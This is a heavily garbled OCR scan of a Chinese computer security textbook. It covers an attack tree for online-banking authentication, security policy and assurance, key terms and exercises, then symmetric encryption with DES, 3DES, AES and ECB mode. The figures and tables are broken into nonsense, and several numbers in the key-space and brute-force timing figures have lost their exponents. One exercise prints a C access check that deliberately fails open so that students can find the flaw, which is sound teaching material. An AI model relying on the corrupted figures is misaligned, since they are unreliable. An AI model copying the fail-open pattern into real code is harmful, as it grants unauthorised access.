利用 已 知 的 认证 会 话 (use of known authenticated session): 此 类 攻击 会 说 服用 户 或 强制 
用 户 通过 预先 设置 的 会 话 ID 连接 IBS。 一 旦 用 户 通 过 了 服务 器 的 认证 ， 攻 击 者 就 可 以 
利用 已 知 的 会 话 ID 向 IBS 发 送 数 据 包 ， 冒 充 用 户 的 身份 信息 。 

图 1-4 给 出 了 有 关 网 银 认 证 应 用 中 不 同类 型 攻击 的 一 个 概览 。 从 这 棵 攻击 树 出 发 ， 安 全 分 
析 师 可 以 评估 每 个 攻击 的 风险 ， 并 使 用 上 一 节 〈1.4 节 ) 中 列 出 的 设计 原则 设计 全 面 的 安全 设 
施 。[DIMO07] 提供 了 基于 这 种 思想 的 设计 成 果 。 
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获取 银行 账户 
获取 用 户 认证 UT/UIa 监 视 用 户 


UT/Utb 资 取 令 牌 和 
手写 记录 


安装 恶意 软件 漏洞 利用 
UT/U3a 智 能 卡 分 析 器 UT/U2a 隐 藏 的 代码 
UTI/U3b 智 能 卡 阅 读 
机 械 手 UT/U2c 带 有 恶意 代码 
UT/U3c 利 用 PIN 的 电子 邮件 
计算 器 蛮 力 破解 
| ccmR | 
Ceiba 
UT/U4b Web HIB 
命令 注 人 CC3 主 动 的 中 间 人 攻击 
猜测 用 户 凭证 IBS1 蛮 力 攻击 
IBS2 安 全 策略 违反 
攻击 者 利用 已 知 的 用 特定 的 会 话 ID 进 行 CC4 预 定义 的 会 话 
认证 会 话 正常 的 用 户 认证 ID (会 话 动 持 ) 


图 1-4 ”网 银 认证 的 攻击 树 


1.6 计算 机 安全 策略 


下 面 简要 归纳 一 下 为 提供 计算 机 安全 采用 的 策略 ， 用 以 总 结 本 章 的 内 容 。[LAMP04] 提出 
的 全 方位 的 安全 策略 涉及 以 下 三 个 方面 : 
规范 /策略 (specification/policy): 安全 方案 应 该 要 实现 什么 ? 
e 实施 /机 制 (implementation/mechanism): 安全 策略 是 如 何 实现 的 ? 
o 正确 性 /保证 (correctness/assurance): 安全 策略 是 否 确实 起 作用 了 ? 


1.6.1 安全 策略 


设计 安全 服务 和 安全 机 制 的 第 一 步 是 开发 安全 策略 。 在 计算 机 安全 领域 人 们 以 各 种 不 同 的 
方式 使 用 安全 策略 这 个 术语 ( security policy)。 至 少 ， 安 全 策略 是 系统 期 望 行为 的 非 形式 化 描 
述 [NRC91]。 这 种 非 形式 化 策略 应 参考 机 密 性 、 完 整 性 和 可 用 人 性 的 要 求 。 更 普遍 的 情况 ， 安 全 
策略 是 规定 或 控制 系统 及 组 织 如 何 提供 安全 服务 来 保护 敏感 和 关键 的 系统 资源 的 规则 与 实践 的 
形式 化 陈述 (RFC 2828 )。 这 种 形式 化 安全 策略 有 助 于 通过 系统 的 技术 控制 措施 及 管理 和 运行 
控制 措施 来 予以 实施 。 

在 开发 系统 策略 时 ， 安 全 管理 者 需要 考虑 如 下 几 个 因素 : 

。 需要 保护 的 资产 的 价值 ; 

© 系统 的 脆弱 性 ; 

© 潜在 的 威胁 和 可 能 的 攻击 ; 
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进一步 地 讲 ， 管 理 者 必须 对 下 列 问题 进行 权衡 ; 

e 易 用 性 与 安全 (ease of use versus security): 事实 上， 所 有 安全 措施 都 会 对 易 用 性 产生 
影响 。 正 如 下 面 几 个 例子 所 描述 的 那样 。 访 问 控 制 机 制 要 求 用 户 记 住 口 令 ， 此 外 可 能 
还 要 执行 其 他 的 访问 控制 操作 。 防 火 墙 及 其 他 网 络 安全 措施 可 能 会 降低 可 用 的 传输 容 
量 , 减 慢 响 应 时 间 。 病 毒 检测 软件 会 降低 可 用 的 处 理 能 力 ， 并 可 能 由 于 安全 软件 和 操 
作 系 统 之 间 的 不 正确 交互 而 导致 系统 崩溃 或 故障 。 

© 安全 成 本 与 失效 - 恢复 成 本 (cost of security versus cost of failure and recovery): 除了 易 
用 性 和 性 能 成 本 外 ， 实 施 和 维护 安全 措施 是 直接 的 经 济 成 本 。 所 有 这 些 成 本 必须 与 缺 
乏 某 种 安全 措施 所 导致 的 安全 失效 和 恢复 的 成 本 相 均 衡 。 对 于 安全 失效 和 恢复 成 本 ， 
不 仅 要 考虑 被 保护 资产 的 价值 和 安全 违规 导致 的 损害 ， 还 要 考虑 风险 ， 风 险 是 具有 某 
个 有 害 结果 的 某 个 脆弱 性 有 被 某 个 威胁 利用 的 可 能 。 

因此 ， 安 全 策略 是 可 能 会 受到 法 律 规定 影响 的 商业 决策 。 


16.2 ”安全 实施 


安全 实施 涉及 四 个 互 为 补充 的 行动 步骤 : 

© 预防 (prevention): 理想 的 安全 方案 是 ， 在 这 方案 下 没有 攻击 能 够 成 功 。 尽 管 这 并 不 是 
对 所 有 情况 都 可 行 ， 但 对 于 众多 威胁 ,预防 都 是 一 个 合理 的 目标 。 例 如 ， 考 虑 传输 加 
密 数据 。 如 果 使 用 安全 的 加 密 算法 ， 而 且 采 取 适 当 措 施 防止 对 加 密 密 钥 的 非 授权 访问 ， 
那么 就 能 预防 对 传输 数据 机 密 性 的 攻击 。 

检测 ( detection) : 在 多 数 情况 下 ， 绝 对 的 保护 是 不 可 行 的 ， 但 是 检测 攻击 是 可 以 的 。 
例如 ， 设 计 入 侵 检测 系统 来 检测 是 否 有 非 授 权 用 户 登 录 系统 。 男 一 个 例子 是 检测 拒绝 
服务 攻击 ， 拒 绝 服务 攻击 使 得 通信 或 处 理 器 资源 被 消耗 不 至 于 合法 用 户 不 能 使 用 。 

响应 (response): 如 果 安 全 机 制 检 测 到 一 个 正在 进行 的 攻击 (如 拒绝 服务 攻击 )， 那 么 
系统 能 做 出 响应 ， 中 止 攻击 并 预防 进一步 的 危害 。 

恢复 (recovery): 恢复 的 一 个 实例 是 备份 系统 的 应 用 。 如 果 数 据 的 完整 性 被 损坏 ， 可 以 
重新 装载 以 前 正确 的 数据 备份 。 


1.6.3 ”保证 和 评估 


计算 机 安全 服务 和 机 制 的 “用 户 ”( 如 系统 管理 者 、 销 售 者 、 消 费 者 和 终端 用 户 ) 都 希望 安 
全 措施 能 够 按照 预期 的 目标 正常 工作 。 也 就 是 说 ， 安 全 用 户 希 望 系统 的 安全 基础 设施 能 够 满足 
安全 要 求 并 执行 安全 策略 。 由 这 些 想 法 引入 了 保证 和 评估 的 概念 。 

NIST 计算 机 安全 手册 [NIST95] 定义 保证 (assurance) 为 : 一 方 对 技术 上 和 操作 上 的 安全 
措施 按照 预期 方式 工作 来 保护 系统 及 其 处 理 的 信息 的 信任 程度 。 这 包括 系统 设计 和 系统 实现 。 
因此 ， 保 证 处 理 的 问题 是 :“ 安 全 系统 的 设计 是 否 满足 要 求 ?” 和 “安全 系统 的 实现 是 否 符合 
规范 ?” 

需要 注意 的 是 ， 保 证 是 用 信任 程度 来 表示 的 ， 而 不 是 对 设计 或 实现 的 正确 性 的 形式 化 证 
明 。 就 目前 关于 设计 与 证 明 的 情况 看 ， 越 过 信任 程度 而 达到 绝对 证 明 是 不 可 能 的 。 人 们 在 开发 
定义 需求 、 描 述 设计 与 实施 的 形式 化 模型 ， 以 及 运用 逻辑 和 数学 技巧 来 处 理 这 些 问 题 方面 已 经 
做 了 很 多 工作 。 但 是 ， 保 证 依然 停留 在 一 个 信任 程度 层面 。 

评估 (evaluation) 是 依据 某 准 则 检查 计算 机 产品 或 系统 的 过 程 。 评 估 包 括 测试 ， 可 能 还 包 
括 形式 化 分 析 或 数学 技术 。 该 领域 的 中 心 工作 是 开发 能 够 应 用 到 任何 安全 系统 (包括 安全 服务 
和 机 制 ) 并 对 产品 比较 提供 广泛 支持 的 评估 准则 。 


1.7 ”推荐 读物 


阅读 一 些 计算 机 安全 方面 的 经 典 的 导论 性 文章 是 非常 有 用 的 ， 这 些 文章 从 历史 的 观点 评价 
了 现在 的 工作 和 思路 ， 可 以 参考 的 论文 有 [WARE79]、[BROW72]、[SALT75] 、[SHAN77] 和 
[SUMM84]。 最 近 有 两 篇 计算 机 安全 短篇 读物 : [ANDR04] 和 [LAMP04]。[NIST95] 给 出 了 关 
于 本 主题 的 详细 论述 ( 290 页 )。 另 一 篇 很 好 的 参考 文献 是 [NRC91]。[FRAS97] 也 非常 有 用 。 
NIST SP 800-27[STON04] 和 NSA 的 信息 保障 技术 架构 [NSA02] 是 关于 安全 设计 原则 的 两 
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篇 非常 有 用 的 讨论 文献 。 


关于 计算 机 安全 有 大 量 的 资料 ， 包 括 书籍 、 论 文 和 网 络 资源 。 大 多 数 有 用 和 权威 的 信息 资 
源 应 该 是 一 系列 标准 制定 机 构 所 制定 的 标准 和 规范 ， 和 已 经 被 相关 企业 界 和 政府 部 门 广泛 认可 


的 其 他 资源 。 本 书 在 附录 C 中 列 出 了 一 些 重要 的 资料 。 
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18 ”关键 术语 、 复 习题 和 习题 


关键 术语 availability (可 用 性 ) 

access control (访问 控制 ) complete mediation (绝对 中 介 ) 
active attack ( 主动 攻击 ) confidentiality (机 密 性 ) 
adversary (敌手 ) corruption (损坏 ) 

asset (资产 ) countermeasure (对 策 ) 

assurance (保证 ) data confidentiality (数据 机 密 性 ) 
attack (攻击 ) data integrity (数据 完整 性 ) 
attack surface (攻击 面 ) denial of service (拒绝 服务 ) 
attack tree (攻击 树 ) disruption (破坏 ) 


authentication (认证 ) 
authenticity (真实 性 ) 


economy of mechanism (经 济 机 制 ) 
encapsulation (封装 ) 


26 IF # Ë 


encryption (加 密 ) 

evaluation (评估 ) 

exposure (暴露 ) 

fail-safe defaults (安全 缺 省 设置 ) 
falsification (伪造 ) 
incapacitation 〈( 失 能 ) 
inference (推理 ) 

inside attack〈 内 部 攻击 ) 
integrity (完整 性 ) 
interceptions (截获 ) 
interception (和 人 侵 ) 

isolation (隔离 ) 

layering (分 层 ) 

least astionishment (最 小 惊动 ) 
least commom mechanism (最 小 共用 机 制 ) 
least privilege (最 小 特权 ) 
masquerade (冒充 ) 
misappropriation (盗用 ) 
misuse ( 误 用 ) 

modularity (模块 化 ) 
nonrepudiation ( 抗 抵赖 性 ) 
obstruction (阻碍 ) 


复习 题 
1.1 给 出 计算 机 安全 的 定义 。 


1.2， 被 动 安全 威胁 和 主动 安全 威胁 的 区 别 是 什么 ? 


open design (开放 式 设计 ) 

OSI security architecture (OSI 安全 体系 结构 ) 
outside attack (外 部 攻击 ) 

passive attack (被 动 攻击 ) 

prevent (BHIE) 

privacy (隐私 ) 

psychological acceptability (心理 可 接受 性 ) 
replay ( 重 放 ) 

repudiation (抵赖 ) 

risk (风险 ) 

security attack (安全 攻击 ) 

security mechanism (安全 机 制 ) 
security policy (安全 策略 ) 

security service (安全 服务 ) 
separation of privilege (权限 分 离 ) 
system integrity (系统 完整 性 ) 

system resource (系统 资源 ) 

threat agent (威胁 代理 ) 

traffic analysis (流量 分 析 ) 
unauthorized disclosure( 非 授权 泄露 ) 
usurpation (£7 ) 

vulnerability (脆弱 性 ， 漏 洞 ) 


1.3 列举 并 简要 定义 被 动 和 主动 网 络 安全 攻击 的 分 类 。 


14 列举 并 简要 定义 基本 安全 设计 原则 。 
1.5 解释 攻击 面 和 攻击 树 之 间 的 不 同 。 


习题 


1.1 思考 在 自动 柜员 机 (ATM) 上 ， 用 户 提供 银行 卡 和 个 人 标识 码 〈PIN) 用 于 账户 访问 的 场景 。 给 出 与 


系统 相关 的 机 密 性 、 完 整 性 和 可 用 性 要 求 的 例子 ， 并 说 明 每 种 情况 下 要 求 的 重要 性 等 级 。 


1.2 电话 交换 系统 根据 呼叫 者 请 求 的 电话 号 码 在 交换 网 络 中 路 由 呼叫 。 针 对 这 种 情况 考虑 习题 1.1 给 出 


的 问题 。 


1.3 考虑 一 个 由 许多 机 构 使 用 的 打印 文档 的 桌面 印刷 系统 。 
a. 给 出 存储 数据 的 机 密 性 为 最 高 需求 的 出 版 物 类 型 的 例子 。 
b. 给 出 存储 数据 的 完整 性 为 最 高 需求 的 出 版 物 类 型 的 例子 。 


1.4 


c. 给 出 系统 可 用 性 为 最 高 需求 的 例子 。 

对 于 下 列 每 种 资产 ,分 别 为 机 密 性 、 可 用 性 和 完整 性 缺失 分 配 低 、 中 或 高 影响 级 别 。 并 说 明理 由 。 
a. 一 个 组 织 管理 Web 服务 器 上 的 公开 信息 。 

b. 执法 机 构 管理 极其 敏感 的 调查 信息 。 

c. 金融 组 织 管理 日 常 行政 信息 (不 是 与 隐私 有 关 的 信息 )。 
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d. 一 家 承包 机 构 用 于 大 量 采集 数据 的 信息 系统 既 包 含 敏感 的 、 预 询 价 ( pre-solicitation) 阶段 的 合同 
信息 ， 也 包含 日 常 管理 信息 。 分 别 对 两 个 数据 集 和 整个 信息 系统 的 影响 进行 评价 。 

e. 一 家 电厂 使 用 SCADA (监控 与 数据 采集 ) 系统 控制 大 型 军事 基地 的 电力 分 配 。SCADA 系统 既 包 
含 实 时 传 感 数据 ， 也 包含 日 常 管理 信息 。 分 别 对 两 个 数据 集 和 整个 信息 系统 的 影响 进行 评价 。 


1.5 考虑 如 下 允许 访问 资源 的 代码 : 


1.6 
1.7 


DWORD dwRet = IsAccessAllowed(...); 
if (dwRet == ERROR_ACCESS DENIED) { 
// Security check failed. 

// Inform user that access is denied. 
} else { 

// Security check OK. 


} 


a. 解释 程序 中 存在 的 安全 缺陷 。 

b. 重 写 代 码 以 避免 缺陷 。 

提示 : 考虑 安全 缺 省 设置 原则 。 

设计 攻击 树 ， 目 标 是 获取 物理 安全 中 相关 内 容 的 访问 权限 。 

假设 一 个 公司 在 安装 在 两 个 建筑 内 的 同一 资产 上 运营 ， 一 个 建筑 是 总 部 ， 而 另 一 个 建筑 包含 了 网 络 
和 计算 机 服务 。 物 理 安 全 方面 ， 用 坚固 的 围栏 在 四 周 对 资产 进行 保护 。 除 此 之 外 ， 物 理 安全 还 包括 
了 前 门 的 警卫 。 局 域 网 分 为 总 部 局 域 网 和 网 络 服务 局 域 网 。 网 络 使 用 者 通过 防火 墙 连接 Web 服务 
器 。 拨 号 用 户 通过 拨号 可 以 连接 网 络 服务 局 域 网 。 请 设计 一 个 攻击 树 ， 它 的 根 节点 表示 资产 机 密 的 
泄露 ,包括 物理 上 的 、 社 会 工程 学 和 技术 攻击 。 这 个 攻击 树 可 以 包括 与 节点 (AND-node) 和 或 节点 
(OR-node)。 请 设计 一 个 至 少 包含 15 个 叶子 节点 的 树 。 


18 请 阅读 1.7 节 引 用 的 所 有 经 典 论文 。 写 一 篇 500 ~ 1000 字 的 文章 (或 包含 8 ~ 12 个 幻灯 片 的 PPT), 


总 结 这 些 经 典 论文 中 的 关键 概念 ， 尤 其 是 在 大 多 数 或 所 有 论文 中 出 现 的 概念 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 解释 对 称 分 组 加 密 算法 的 基本 操作 ，; 
比较 和 区 分 分 组 加 密 和 流 密码 ; 


讨论 安全 散 列 函 数 在 消息 认证 中 的 应 用 ; 

列举 安全 散 列 函 数 的 其 他 应 用 场景 ; 

解释 非 对 称 分 组 加 密 算法 的 基本 操作 ，; 

概述 数字 签名 的 机 制 ， 并 阐明 数字 信封 的 概念 ; 
解释 随机 数 与 伪 随 机 数 在 密码 学 中 的 重要 意义 。 





密码 算法 是 计算 机 安全 服务 与 应 用 领域 中 一 个 重要 的 组 成 部 分 。 本 章 概述 了 各 种 类 型 的 密 
码 算法 ， 并 讨论 了 它们 的 适用 性 。 对 于 每 种 类 型 的 算法 ， 介 绍 了 在 常见 应 用 中 最 重要 的 标准 化 
算法 。 关 于 各 种 算法 的 技术 细节 ， 将 在 本 书 第 四 部 分 进行 详细 的 讨论 。 

首先 介绍 对 称 加 密 ， 对 称 加 密 具有 广泛 的 应 用 背景 ， 主 要 用 来 提供 机 密 性 服务 。 之 后 ， 探 
讨 散 列 函 数 的 安全 性 ， 并 讨论 它们 在 消息 认证 领域 中 的 应 用 。 接 下 来 介绍 公 钥 加 密 (也 称 为 
“ 非 对 称 加 密 ” )。 另 外 ， 还 将 介绍 公 钥 加 密 的 两 种 最 重要 的 应 用 ， 即 数字 签名 和 密 钥 管理 。 在 
数字 签名 应 用 中 ， 将 非 对 称 加 密 和 安全 散 列 函数 相 结合 ， 得 到 一 个 极为 有 用 的 工具 。 

最 后 ， 通 过 介绍 存储 数据 的 加 密 给 出 了 一 个 密码 算法 在 实际 中 应 用 的 例子 。 


2.1 用 对 称 加 密实 现 机 密 性 


对 称 加 密 是 为 传输 和 存储 数据 提供 机 密 性 方面 使 用 最 为 广泛 的 一 种 技术 。 本 节 首 先 介绍 
对 称 加 密 的 基本 概念 ， 接 着 讨论 两 个 最 重要 的 对 称 加 密 算法 : 数据 加 密 标 准 ( Data Encryption 
Standard, DES) 和 高 级 加 密 标准 (Advanced Encryption Standard，AES )。 最 后 介绍 对 称 加 密 在 
实现 机 密 性 中 的 应 用 。 


2.1.1 ”对称 加 密 


对 称 加 密 也 称 “ 传 统 加 密 ” 或 “ 单 密 钥 加 密 ”， 是 20 世纪 70 年 代 后 期 公 钥 密码 产生 之 前 
O| 唯一 的 一 种 加 密 技术 。 无 数 的 个 人 和 团体 ， 从 尤 利 乌 斯 .凯撒 (Julius Casar) 到 德国 的 潜水 艇 
41| 部 队 (German U-boat force) 再 到 当今 的 外 交 、 军 事 和 商业 均 使 用 对 称 加 密 来 进行 秘密 通信 。 

对 称 加 密 现 在 仍然 是 两 种 加 密 算法 中 使 用 最 广泛 的 一 种 。 

对 称 加 密 方案 有 五 个 基本 成 分 ( 见 图 2-1 ): 

o 明文 (plaintext)， 作 为 算法 的 输入 ， 是 原始 的 可 理解 的 消息 和 数据 。 

© 加 密 算法 (encryption algorithm): 加 密 算法 对 明文 进行 各 种 代 换 和 变换 。 

o 秘密 密 钥 ( secret key): 秘密 密 钥 也 是 加 密 算法 的 输入 。 算 法 所 用 的 特定 的 代 换 和 变换 

依赖 于 密 钥 。 
e 密 文 (ciphertext) : 作为 算法 的 输出 ， 看 起 来 是 完全 随机 而 杂乱 的 数据 ， 其 依赖 于 明文 
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和 秘密 密 钥 。 对 于 给 定 的 消息 ， 不 同 的 密 钥 将 产生 不 同 的 密 文 。 
© 解密 算法 (decryption algorithm): 解密 算法 本 质 上 是 加 密 算法 的 逆 运 算 ， 输 入 密 文 和 秘 


密 密 钥 可 以 用 解密 算法 恢复 明文 。 
收发 双方 共享 收发 双方 共享 
的 秘密 密 钥 Ai 


— EA 
EK 








es 

aa _* , 
Za ig X-DIKYT 
明文 


wA 加 密 算法 e (加 窗 


(如 DES ) 算法 的 逆 运 算 ) 
图 2-1 对 称 加 密 的 简化 模型 


对 称 加 密 的 安全 使 用 需要 满足 如 下 两 个 要 求 : 

1. 加 密 算法 必须 是 足够 强 的 。 至少， 这 个 算法 在 敌手 知道 它 并 且 能 够 得 到 一 个 或 者 多 个 密 
文 时 也 不 能 破译 密 文 或 计算 出 密 钥 。 这 个 要 求 通常 用 一 种 更 强 的 形式 表述 为 : 即使 敌手 拥有 一 
定数 量 的 密 文 和 用 于 产生 这 些 密 文 的 明文 ， 他 也 不 能 破译 密 文 或 发 现 密 钥 。 

2. 发 送 者 和 接收 者 必须 在 某 种 安全 的 形式 下 获得 秘密 密 钥 并 且 必 须 保证 密 钥 的 安全 。 如 果 
有 人 发 现 该 密 钥 ， 并 且 知 道 相应 的 算法 ， 那 么 就 能 读 出 使 用 该 密 钥 加 密 的 所 有 通信 内 容 。 

攻击 对 称 加 密 体 制 有 两 种 一 般 的 方法 。 第 一 种 攻击 方法 是 密码 分 析 学 〈 cryptanalysis)。 密 
码 分 析 学 的 攻击 依赖 于 算法 的 性 质 以 及 可 能 得 到 的 明文 的 一 般 特 征 甚至 某 些 明文 - 密 文 对 的 样 
本 。 这 种 形式 的 攻击 企图 利用 算法 的 特征 来 推导 出 特定 的 明文 或 使 用 的 密 钥 。 如 果 这 种 攻击 成 
功 地 推导 出 密 钥 ， 那 么 影响 将 是 灾难 性 的 : 将 会 危及 所 有 未 来 和 过 去 使 用 该 密 钥 加 密 的 信息 的 
安全 。 

第 二 种 方法 是 蛮 力 攻击 (brute-force attack) (这 里 也 可 称 为 穷 举 攻击 )。 蛮 力 攻击 者 对 一 条 
密 文 尝试 所 有 可 能 的 密 钥 ， 直 至 把 它 转化 为 可 读 的 有 意义 的 明文 。 平 均 而 言 ， 获 得 成 功 至 少 要 
尝试 所 有 可 能 密 钥 的 一 半 。 也 就 是 说 ， 如 果 存 在 x 种 不 同 的 密 钥 ,攻击 者 只 有 做 出 x/2 次 尝试 
后 才 可 能 获得 真正 的 密 钥 。 值 得 说 明 的 是 ， 蛮 力 攻击 并 非 指 的 是 尝试 所 有 可 能 的 密 钥 。 除 非 是 
在 明文 已 知 的 情况 下 ， 密 码 分 析 者 会 尝试 所 有 密 钥 ， 以 确认 所 给 的 明文 是 否 是 真正 的 明文 。 如 
果 消 息 仅仅 是 英文 的 明文 ， 那 么 结果 很 容易 得 到 ， 而 其 中 英文 识别 工作 需要 自动 完成 。 如 果 文 
本 消息 在 加 密 前 进行 了 压缩 ， 那 识别 就 很 困难 了 。 如 果 信息 是 更 一 般 的 数据 类 型 ， 如 数字 文 
件 ， 并 进行 了 压缩 ， 那 么 识别 就 更 难于 自动 实现 了 。 因 此 ， 作 为 对 蛮 力 攻击 的 补充 ， 还 需要 知 
道 相 关 明 文 的 某 种 程度 的 知识 ， 并 且 需 要 有 将 正确 的 明文 从 杂乱 的 明文 堆 里 自动 识别 出 来 的 某 
些 方法 。 


2.1.2 ”对 称 分 组 加 密 算 法 


使 用 最 广泛 的 对 称 加 密 算法 是 分 组 密码 。 分 组 密码 是 将 定 长 的 明文 转换 成 与 明文 等 长 的 
密 文 。 该 算法 将 较 长 的 明文 划分 为 一 系列 定 长 的 块 。 最 重要 的 对 称 算法 ， 包 括 数据 加 密 标准 
(DES), =H DES (3DES) 和 高 级 加 密 标 准 (AES) ( 见 表 2-1 )， 它 们 都 使 用 分 组 密码 。 本 小 节 
对 这 些 算法 进行 综述 ， 第 20 章 将 给 出 相关 的 详细 的 技术 细节 。 

数据 加 密 标准 ”使 用 最 广泛 的 加 密 体制 是 数据 加 密 标准 (DES)， 它 于 1977 年 被 美国 国家 
标准 局 (National Bureau of Standards) 即 现在 的 国家 标准 和 技术 研究 所 ( National Institute of 
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Standards and Technology, NIST) 采纳 为 联邦 信息 处 理 标准 46 ( Federal Information Processing 
Standard 46, FIPS PUB 46) 9。 这 个 算法 本 身 被 称 为 数据 加 密 算法 (Data Encryption Algorithm, 
DEA). DES 采用 64 位 长 度 的 明文 分 组 和 56 位 长 度 的 密 钥 ， 产 生 64 位 长 度 的 密 文 分 组 。 


表 2-1 三 种 流行 对 称 加 密 算法 的 比较 










注 : DES = 数据 加 密 标准 AES 三 高 级 加 密 标准 


可 从 两 个 方面 关注 DES 的 强度 如 何 : 一 是 关注 算法 本 身 ， 二 是 关注 56 位 密 钥 的 使 用 。 前 
者 关注 密码 分 析 者 利用 DES 算法 本 身 的 特征 进行 密码 分 析 的 可 能 性 。 多 年 来 ， 人 们 已 进行 无 
数 次 尝试 ， 试 图 发 现 并 利用 算法 中 存在 的 弱点 ，DES 也 因此 成 为 现在 研究 最 深入 的 加 密 标准 。 
尽管 如 此 ， 至 今 还 没有 关于 DES 的 致命 弱点 的 报道 。 

受到 更 多 关注 的 是 密 钥 长 度 ，56 位 的 密 钥 共有 2% 种 可 能 ， 这 个 数字 大 约 是 7.2X10''。 遗 
憾 的 是 ， 考 虑 到 现在 的 商用 处 理 器 速度 ， 这 个 密 钥 长 度 是 严重 不 足 的 。 希 捷 科 技 公司 (Seagate 
Technology) 的 一 篇 文章 [SEAG08] 指出 ， 在 现今 的 多 核 计 算 机 上 ， 每 秒 尝试 十 亿 〈( 10” ) 种 密 
钥 组 合 已 成 为 可 能 。 而 市 场 现状 也 证 实 了 这 一 点 。Intel 和 AMD 公司 提出 用 基于 指令 的 硬件 加 
速 AES 算法 的 运行 。 在 当前 Intel 多 核 处 理 器 上 进行 的 多 次 测试 表明 ， 速 度 大 约 为 每 秒 五 亿 次 
的 加 密 运 算 可 以 实现 [BASU12]。 而 另外 一 个 近期 分 析 指出 ， 基 于 当前 的 超级 计算 机 技术 ， 每 
秒 执行 10* 次 加 密 运算 已 成 为 可 能 [AROR12]。 

鉴于 上 述 理论 结果 ， 表 2-2 给 出 了 对 于 不 同 的 密 钥 长 度 ， 蛮 力 攻 击 方法 破译 密码 所 需 的 时 
间 。 由 该 表 可 见 ， 一 台 PC 破解 一 个 密 钥 长 度 为 56 位 的 DES 密码 需要 10 小 时 ; 如 果 由 多 个 
PC 并 发 运行 ， 那 么 所 需 时 间 会 大 大 缩短 ; 而 当前 的 超级 计算 机 在 1 小 时 内 就 应 该 能 够 完成 这 
个 运算 。128 位 或 更 多 位 密 钥 能 保证 算法 不 会 被 简单 蛮 力 破解 ， 即 使 设法 将 破解 机 的 速度 提高 
10? 倍 ， 仍 然 需要 100 000 年 的 时 间 来 破解 密码 。 


表 2-2 穷 举 密 钥 搜 索 所 需 的 平均 时 间 


按 10? 次 解密 /hs 

加 密 算法 可 选 密 钥 个 数 
2m3 x10" | 27 ye=53x 10 年 
3DES 21%=3.7X 10° 2 us=5.8X 10° 年 
2176.3 X 10” 2" us=9.8 X 10% 年 
amaxo | Pus= 18x10" 


幸运 的 是 ， 还 有 一 些 算法 可 以 用 来 替代 DES， 例 如 在 本 节 接 下 来 要 讨论 的 三 重 DES Al AES. 
三 重 DES 算法 三 重 DES (3DES) 的 使 用 延长 了 DES 算法 的 寿命 ， 它 重复 基本 的 DES 
算法 三 次 ， 采 用 两 个 或 三 个 不 同 的 密 钥 ， 密 钥 长 度 为 112 位 或 168 位 。 三 重 DES (3DES) 于 












按 10 次 解密 /hs 
计算 所 需 时 间 


ZAKE (tir) 
5.3X 10" 年 
5.8X 10 年 
9.8X 10% 年 
1.8X 10% 年 









© NIST 是 为 美国 政府 部 门 和 机 构 开 发 标准 的 一 个 政府 机 构 ， 其 开发 的 标准 叫 作 联邦 信息 处 理 标准 (FIPS). 5 
Sb FIPS 也 广泛 应 用 于 政府 部 门 之 外 的 地 方 。 请 见 附录 D 的 讨论 。 
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1985 年 在 ANSI 标准 X 9.17 中 被 首次 标准 化 ， 在 金融 领域 被 应 用 。1999 年 随 着 FIPS PUB 46-3 
的 发 布 ，3DES 被 合并 为 数据 加 密 标准 (Data Encryption Standard) 的 一 部 分 。 

3DES 有 两 个 优点 确保 了 它 在 未 来 几 年 里 的 广泛 应 用 。 首 先 ， 它 的 密 钥 长 度 是 168 位 ， 故 
能 克服 DES 所 面临 的 蛮 力 攻击 问题 。 其 次 ，3DES 的 底层 加 密 算法 与 DES 的 加 密 算法 相同 ， 
该 算法 比 任何 其 他 加 密 算 法 被 分 析 破解 所 需要 的 时 间 要 长 得 多 ， 且 也 未 能 发 现 有 比 蛮 力 攻击 更 
有 效 的 、 基 于 算法 本 身 的 密码 分 析 攻 击 方法 。 相 应 地 ，3DES 对 密码 分 析 攻 击 有 很 强 的 免疫 力 。 
如 果 考 虑 算法 安全 ，3DES 将 成 为 未 来 十 年 加 密 算法 标准 的 合适 选择 。 

3DES 的 根本 缺点 在 于 用 软件 实现 算法 的 速度 比较 慢 。 起 初 ，DES 是 为 20 世纪 70 年 代 中 
期 的 硬件 实现 设计 的 ， 因 而 难于 用 软件 有 效 实现 该 算法 。3DES 要 求 三 倍 于 DES 的 计算 量 ， 故 
其 速度 要 慢 得 多 。 另 一 个 缺点 是 ，DES 和 3DES 的 分 组 长 度 均 为 64 位 ， 就 效率 和 安全 性 而 言 ， 
其 分 组 长 度 应 更 长 。 

高 级 加 密 标 准 ”由 于 自身 存在 缺陷 ，3DES 不 能 成 为 长 期 使 用 的 理想 的 加 密 算法 标准 。 作 
AER, NIST 在 1997 年 公开 征集 新 的 高 级 加 密 标准 ( AES )， 要 求 其 安全 强度 不 低 于 3DES 
并 能 显著 提高 计算 效率 。 除 了 这 些 通常 的 要 求 之 外 ，NIST 特别 规定 了 高 级 加 密 标准 必须 是 分 
组 长 度 为 128 位 的 对 称 分 组 密码 ， 并 能 支持 长 度 为 128 位 、192 位 和 256 位 的 密 钥 。 算 法 评估 
准则 包括 安全 性 、 计 算 效 率 、 存 储 空间 要 求 、 硬 件 和 软件 平台 的 适应 性 ， 以 及 灵活 性 等 。 

15 个 候选 算法 通过 了 第 一 轮 评估 。 而 仅 有 5 个 候选 算法 通过 了 第 二 轮 评估 。NIST 在 2001 
年 11 月 完成 了 评估 并 发 布 了 最 终 标准 (FIPS PUB 197 )。NIST 选择 Rijndael 作为 建议 的 AES 
算法 。AES 现在 已 经 广泛 应 用 于 商业 产品 。 有 关 AES 的 内 容 将 在 第 20 章 进行 详细 的 介绍 。 

实际 的 安全 问题 一 般 来 说 ， 对 称 加 密 应 用 于 长 于 64 位 或 128 位 分 组 的 数据 单元 。 电 子 
邮件 消息 、 网 络 包 、 数 据 库 记录 和 其 他 明文 消息 源 用 对 称 分 组 密码 加 密 时 ， 必 须 将 它们 分 成 
固定 长 度 的 分 组 序列 。 最 简单 的 多 分 组 加 密 方 式 被 称 为 电子 源码 书 (ECB ) 模式 。 在 该 
模式 中 ， 明 文 每 次 被 提交 5 位 并 且 每 组 明文 用 相同 的 密 钥 进行 加 密 。 通 常 ,，b 二 64 或 b 二 128。 
图 2-2a 显示 了 ECB 模式 的 工作 过 程 。 长 度 为 nb 的 明文 被 分 成 了 nn 个 b 位 的 分 组 (Pi, Po, …， 
P,)， 每 个 分 组 用 相同 的 算法 和 相同 的 密 钥 加 密 ， 产 生出 由 个 5 位 分 组 组 成 的 密 文 序列 
(Ci, Cm Cao 

对 于 很 长 的 消息 ，ECB 模式 可 能 不 安全 。 如 果 消 息 的 结构 化 非常 好 ， 密 码 分 析 者 可 能 利 
